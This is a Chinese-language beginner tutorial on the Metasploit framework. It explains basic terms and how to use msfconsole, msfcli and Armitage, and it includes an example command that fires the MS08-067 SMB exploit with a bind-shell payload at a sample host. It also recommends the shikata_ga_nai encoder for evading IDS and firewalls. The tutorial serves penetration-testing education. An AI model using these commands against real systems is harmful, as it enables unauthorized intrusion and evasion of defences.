一、MSF简介

   MFS也称Metasploit，是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。

  2004年8月，在拉斯维加斯开了一次世界黑客交流会---黑帽简报（Black Hat Briefings). 在这个会议上，一款叫Metasploit 的攻击和渗透工具备受众黑客关注，出尽了风头。

二、名称解释

 渗透测试攻击-exploit

  渗透测试是指由攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞，所进行的攻击行为。流行的攻击技术包括：缓冲区溢出、web应用程序漏洞攻击，以及利用配置错误等

 攻击载荷-payload

  我们想让被攻击系统执行的程序，如reverse shell 可以从目标机器与测试者之间建立一个反向连接，bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只能在目标机器上执行有限命令的程序

shellcode 

 

是进行攻击时的一系列被当作payload 的指令，通常在目标机器上执行之后提供一个可

执行命令的shell。

 module

MSF 的模块，由一系列代码组成。

 listener

等待来自被攻击机器的incoming 连接的监听在测试者机器上的程序。

三、metasploit基础

1、 MSF 提供多种用户界面：控制台模式（msfconsole），命令行模式（msfcli），图形模式（msfgui、armitage），（在老版本中还有web 界面模式，后来貌似由于安全因素被取消了？）其中console模式最常用，启动方式：

cd /opt/framework/msf3/

msfconsole

运行此命令后将进入msf 命令提示符：

msf>

2、获取命令的帮助信息：help

例子：

help connect

3、msfcli 和msfconsole 相比不提供交互方式，它直接从命令行输入所有参数并产生结果，

msfcli –h #获取帮助信息

msfcli <exploit_name> <option=value> [mode]

 

mode:H（help）帮助

S（summary）显示模块信息

O（options）显示模块的可用选项

A（advanced）显示高级选项

I（ids）显示IDS EVASION 选项

P（payload）显示此模块可用的payload

T（targets）显示可用targets

4

AC（action）显示可用actions

C（check）运行模块测试

E（execute）执行选定的模块

===============

例子：ms08_067_netapi 模块

msfcli windows/smb/ms08_067_netapi O #查看可用选项

msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.111 P #查看可用payload

msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.111 PAYLOAD=windows/shell/bind_tcp E

#执行（此处O、P 等参数也可以用小写）

4、Armitage :MSF 的一个图形接口

运行方式：

cd /opt/farmework/msf3/

armitage

5、MSF 其他组件：

MSFpayload 工具：

用于生成shellcode，可生成C,Ruby，JaveScript，VB 格式的shellcode。

帮助信息：

msfpayload –h

MSFencode 工具：

编码压缩shellcode，过IDS ,防火墙。

msfencode -h

msfencode –l 查看可用的编码器（encoders），效果最佳的是x86/shikata_ga_nai